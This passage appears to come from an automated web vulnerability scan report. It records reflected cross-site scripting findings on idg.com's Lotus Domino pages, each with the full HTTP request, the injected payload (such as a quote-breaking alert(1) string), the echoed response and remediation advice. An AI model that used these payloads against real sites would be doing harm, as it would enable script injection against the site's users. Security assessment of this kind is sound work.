GET /www/HomeNew.nsf/docs/corporate_profile?85712"-alert(1)-"9259a875ca6=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:44 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5039 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/corporate_profile?85712"-alert(1)-"9259a875ca6=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36e57"%3b024fc10ff1c was submitted in the REST URL parameter 1. This input was echoed as 36e57";024fc10ff1c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www36e57"%3b024fc10ff1c/HomeNew.nsf/docs/idc HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:40 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5012 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www36e57";024fc10ff1c/HomeNew.nsf/docs/idc"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 116af"%3b1f71a9ba6af was submitted in the REST URL parameter 3. This input was echoed as 116af";1f71a9ba6af in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs116af"%3b1f71a9ba6af/idc HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:43 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5012 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs116af";1f71a9ba6af/idc"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 359bd"%3bc32d7581091 was submitted in the REST URL parameter 4. This input was echoed as 359bd";c32d7581091 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/idc359bd"%3bc32d7581091 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:44 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5012 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idc359bd";c32d7581091"); } catch(err) {}</script> ...[SNIP]...
2.145. http://idg.com/www/HomeNew.nsf/docs/idc [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/idc
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ae8e"-alert(1)-"283f308e868 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/idc?2ae8e"-alert(1)-"283f308e868=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:39 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5025 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idc?2ae8e"-alert(1)-"283f308e868=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed326"%3b904e4d03b9 was submitted in the REST URL parameter 1. This input was echoed as ed326";904e4d03b9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwed326"%3b904e4d03b9/HomeNew.nsf/docs/idg_executives HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:44 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5022 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwed326";904e4d03b9/HomeNew.nsf/docs/idg_executives"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d561"%3b6455cc6564d was submitted in the REST URL parameter 3. This input was echoed as 3d561";6455cc6564d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs3d561"%3b6455cc6564d/idg_executives HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:45 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5023 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs3d561";6455cc6564d/idg_executives"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e552"%3b216bed3b756 was submitted in the REST URL parameter 4. This input was echoed as 3e552";216bed3b756 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/idg_executives3e552"%3b216bed3b756 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:46 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5023 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idg_executives3e552";216bed3b756"); } catch(err) {}</script> ...[SNIP]...
2.149. http://idg.com/www/HomeNew.nsf/docs/idg_executives [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/idg_executives
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e2af"-alert(1)-"0a5722af41d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/idg_executives?1e2af"-alert(1)-"0a5722af41d=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:43 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5036 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idg_executives?1e2af"-alert(1)-"0a5722af41d=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e22a"%3bd456b889b9 was submitted in the REST URL parameter 1. This input was echoed as 8e22a";d456b889b9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www8e22a"%3bd456b889b9/HomeNew.nsf/docs/idg_privacy_policy HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:58 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5026 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www8e22a";d456b889b9/HomeNew.nsf/docs/idg_privacy_policy"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff749"%3be32ec39d933 was submitted in the REST URL parameter 3. This input was echoed as ff749";e32ec39d933 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docsff749"%3be32ec39d933/idg_privacy_policy HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:59 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5027 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docsff749";e32ec39d933/idg_privacy_policy"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d638"%3bc7eb102dcb6 was submitted in the REST URL parameter 4. This input was echoed as 9d638";c7eb102dcb6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/idg_privacy_policy9d638"%3bc7eb102dcb6 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:03 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5027 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idg_privacy_policy9d638";c7eb102dcb6"); } catch(err) {}</script> ...[SNIP]...
2.153. http://idg.com/www/HomeNew.nsf/docs/idg_privacy_policy [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/idg_privacy_policy
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2605f"-alert(1)-"fae0f9d2f09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/idg_privacy_policy?2605f"-alert(1)-"fae0f9d2f09=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:58 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5040 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idg_privacy_policy?2605f"-alert(1)-"fae0f9d2f09=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2ba2"%3bf9d8deefc6f was submitted in the REST URL parameter 1. This input was echoed as c2ba2";f9d8deefc6f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwc2ba2"%3bf9d8deefc6f/HomeNew.nsf/docs/intl_media_contacts HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:58 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5028 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwc2ba2";f9d8deefc6f/HomeNew.nsf/docs/intl_media_contacts"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b835"%3b5a981b27a8 was submitted in the REST URL parameter 3. This input was echoed as 7b835";5a981b27a8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs7b835"%3b5a981b27a8/intl_media_contacts HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:00 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5027 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs7b835";5a981b27a8/intl_media_contacts"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc268"%3b237152f115b was submitted in the REST URL parameter 4. This input was echoed as bc268";237152f115b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/intl_media_contactsbc268"%3b237152f115b HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:04 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5028 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/intl_media_contactsbc268";237152f115b"); } catch(err) {}</script> ...[SNIP]...
2.157. http://idg.com/www/HomeNew.nsf/docs/intl_media_contacts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/intl_media_contacts
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7654"-alert(1)-"8faa41383a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/intl_media_contacts?c7654"-alert(1)-"8faa41383a4=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:58 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5041 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/intl_media_contacts?c7654"-alert(1)-"8faa41383a4=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98663"%3b8f87c12c52b was submitted in the REST URL parameter 1. This input was echoed as 98663";8f87c12c52b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
